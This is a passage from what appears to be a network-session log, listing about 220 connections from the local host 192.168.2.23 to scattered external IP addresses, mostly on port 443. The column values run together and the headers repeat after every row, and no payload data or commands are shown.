                                        10509192.168.2.2360300209.47.22.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10510192.168.2.235832450.227.240.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10511192.168.2.2348540222.64.120.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10512192.168.2.2348954207.22.79.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10513192.168.2.23427369.173.25.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10514192.168.2.2337582100.51.15.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10515192.168.2.233377895.150.205.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10516192.168.2.234540095.103.225.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10517192.168.2.2343128160.81.149.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10518192.168.2.2342860176.83.241.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10519192.168.2.234334493.60.215.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10520192.168.2.2349628183.29.222.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10521192.168.2.2356642207.67.137.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10522192.168.2.235368846.20.131.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10523192.168.2.2335678136.21.137.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10524192.168.2.234064665.182.2.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10525192.168.2.2334900117.111.188.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10526192.168.2.235274488.16.204.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10527192.168.2.2349132150.59.109.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10528192.168.2.236067837.89.109.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10529192.168.2.2332810160.244.46.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10530192.168.2.2340136102.175.162.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10531192.168.2.2355894220.211.141.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10532192.168.2.234374835.109.34.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10533192.168.2.2338262131.241.68.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10534192.168.2.233341465.147.73.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10535192.168.2.2333096187.122.222.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10536192.168.2.236095886.137.104.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10537192.168.2.235022813.223.0.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10538192.168.2.234525059.217.255.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10539192.168.2.235709840.26.147.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10540192.168.2.2353882220.129.198.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10541192.168.2.234865042.243.170.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10542192.168.2.2350802114.222.201.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10543192.168.2.234673453.44.185.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10544192.168.2.2354276100.174.114.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10545192.168.2.2358752171.172.177.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10546192.168.2.233708861.86.73.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10547192.168.2.233548061.127.23.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10548192.168.2.235830642.75.29.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10549192.168.2.2342772100.234.134.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10550192.168.2.2333470166.226.4.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10551192.168.2.234219848.143.186.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10552192.168.2.235264223.92.237.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10553192.168.2.235385881.109.21.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10554192.168.2.2338292131.111.97.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10555192.168.2.235241448.204.88.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10556192.168.2.2348538166.252.100.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10557192.168.2.2360144157.0.179.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10558192.168.2.233704265.190.230.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10559192.168.2.235934060.90.111.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10560192.168.2.2338858212.65.208.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10561192.168.2.2351200213.226.43.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10562192.168.2.2338436197.7.182.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10563192.168.2.2355432181.179.210.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10564192.168.2.235988218.54.205.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10565192.168.2.2340074140.179.190.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10566192.168.2.2360352188.121.168.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10567192.168.2.2360060197.73.85.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10568192.168.2.2346010148.177.236.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10569192.168.2.2349218111.132.101.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10570192.168.2.2335002186.184.69.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10571192.168.2.23368521.174.204.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10572192.168.2.2358134177.236.191.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10573192.168.2.2333948126.29.164.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10574192.168.2.2354838176.162.152.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10575192.168.2.235859267.84.36.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10576192.168.2.234146697.50.142.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10577192.168.2.233595275.176.46.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10578192.168.2.236007620.49.191.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10579192.168.2.234474466.10.234.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10580192.168.2.2338966210.219.110.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10581192.168.2.2339122207.82.91.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10582192.168.2.2338904199.19.207.558080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10583192.168.2.2349080156.219.234.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10584192.168.2.2350016131.200.39.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10585192.168.2.2345756183.104.243.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10586192.168.2.2341496193.242.61.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10587192.168.2.2353836129.191.242.135443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10588192.168.2.2356000183.212.55.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10589192.168.2.233519437.113.198.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10590192.168.2.2352908140.106.131.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10591192.168.2.2343626114.85.65.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10592192.168.2.235572066.168.14.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10593192.168.2.2351404205.170.192.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10594192.168.2.234656078.95.53.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10595192.168.2.2336112111.189.75.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10596192.168.2.233484865.143.48.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10597192.168.2.235313284.161.52.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10598192.168.2.2352532147.100.247.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10599192.168.2.2343370147.232.74.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10600192.168.2.2350236100.1.21.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10601192.168.2.2335032200.246.202.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10602192.168.2.234299089.18.19.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10603192.168.2.2350086201.242.90.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10604192.168.2.2354738144.42.202.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10605192.168.2.2358708108.224.226.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10606192.168.2.2338002201.64.149.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10607192.168.2.2340374186.167.242.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10608192.168.2.234611417.119.185.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10609192.168.2.234080851.253.254.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10610192.168.2.233466037.146.25.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10611192.168.2.2349614144.177.159.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10612192.168.2.234399680.142.224.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10613192.168.2.2352936177.21.102.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10614192.168.2.2355436147.82.23.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10615192.168.2.234225077.144.20.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10616192.168.2.2349178200.24.117.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10617192.168.2.2342318196.58.223.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10618192.168.2.2338890158.64.213.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10619192.168.2.233786875.148.183.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10620192.168.2.2335864189.10.41.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10621192.168.2.2349442170.224.187.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10622192.168.2.2334110211.138.23.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10623192.168.2.2352638157.249.167.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10624192.168.2.2353548130.164.234.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10625192.168.2.235218087.17.134.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10626192.168.2.2352562192.98.255.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10627192.168.2.2338538109.140.73.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10628192.168.2.2348594132.225.100.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10629192.168.2.23487262.83.162.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10630192.168.2.2355094144.167.191.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10631192.168.2.2358688219.44.10.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10632192.168.2.234430846.192.133.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10633192.168.2.2358030117.162.112.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10634192.168.2.2344576192.186.155.298080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10635192.168.2.235752452.62.71.151443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10636192.168.2.234122674.179.32.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10637192.168.2.2344012138.6.124.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10638192.168.2.235914251.172.248.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10639192.168.2.234340464.65.116.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10640192.168.2.233489075.61.29.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10641192.168.2.2337982221.214.137.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10642192.168.2.235690420.250.193.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10643192.168.2.2353196144.131.218.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10644192.168.2.2356492217.154.185.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10645192.168.2.2344726141.48.101.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10646192.168.2.2360048194.51.117.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10647192.168.2.2344560222.26.103.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10648192.168.2.2343690212.212.42.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10649192.168.2.234993236.25.244.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10650192.168.2.2344660161.232.244.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10651192.168.2.235444699.113.18.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10652192.168.2.2334546217.232.249.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10653192.168.2.2360956108.67.162.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10654192.168.2.233997618.106.156.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10655192.168.2.2358474211.84.161.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10656192.168.2.2336038141.32.248.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10657192.168.2.2358384175.38.33.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10658192.168.2.2351758101.168.170.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10659192.168.2.233613653.21.201.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10660192.168.2.23436525.172.115.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10661192.168.2.235961623.64.2.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10662192.168.2.233442641.117.174.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10663192.168.2.235137098.189.134.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10664192.168.2.23368122.124.180.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10665192.168.2.2359812143.94.219.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10666192.168.2.23536269.215.65.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10667192.168.2.234611435.186.73.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10668192.168.2.235299061.124.59.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10669192.168.2.2334402132.204.180.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10670192.168.2.2336948222.135.218.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10671192.168.2.234898020.46.120.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10672192.168.2.23367189.86.147.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10673192.168.2.2347510106.86.62.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10674192.168.2.2346948204.11.127.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10675192.168.2.234950451.228.64.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10676192.168.2.23454181.87.130.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10677192.168.2.2360022213.70.174.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10678192.168.2.2333128107.205.199.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10679192.168.2.2338764201.129.187.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10680192.168.2.2342854150.220.243.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10681192.168.2.2356352122.86.200.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10682192.168.2.235279870.177.201.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10683192.168.2.234262453.226.243.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10684192.168.2.235587682.114.119.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10685192.168.2.235335079.144.99.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10686192.168.2.233522849.51.55.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10687192.168.2.2337144217.227.154.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10688192.168.2.2350272180.71.117.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10689192.168.2.2336836182.127.172.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10690192.168.2.2334842199.145.146.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10691192.168.2.2349782161.237.18.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10692192.168.2.235203485.164.15.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10693192.168.2.234969417.240.142.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10694192.168.2.2343342160.150.176.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10695192.168.2.2336350197.180.97.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10696192.168.2.2346758161.146.192.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10697192.168.2.2347678137.207.171.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10698192.168.2.2353636148.164.155.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10699192.168.2.2332968207.30.3.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10700192.168.2.2360562134.245.96.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10701192.168.2.2359682190.92.52.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10702192.168.2.2344354189.200.110.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10703192.168.2.2348348115.2.98.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10704192.168.2.234380863.92.133.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10705192.168.2.2332942195.81.30.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10706192.168.2.235409063.89.119.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10707192.168.2.2343690121.111.76.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10708192.168.2.235850286.49.156.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10709192.168.2.233973286.160.46.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10710192.168.2.233990213.211.6.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10711192.168.2.2341414136.141.49.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10712192.168.2.234802036.56.66.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10713192.168.2.234160676.30.68.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10714192.168.2.233757892.178.49.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10715192.168.2.2341074223.226.169.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10716192.168.2.234351483.67.84.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10717192.168.2.233681894.133.99.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10718192.168.2.2345708166.97.120.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10719192.168.2.2336494133.194.207.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10720192.168.2.2337116193.19.37.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10721192.168.2.2356588150.176.254.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10722192.168.2.233532661.85.183.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10723192.168.2.2341126210.78.139.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10724192.168.2.2346018122.48.176.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10725192.168.2.234412449.226.140.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10726192.168.2.233496660.29.208.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10727192.168.2.2348144159.247.98.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10728192.168.2.2355318148.54.80.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10729192.168.2.2355934162.235.148.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10730192.168.2.2350164220.224.150.189443
                                        TimestampBytes transferredDirectionData


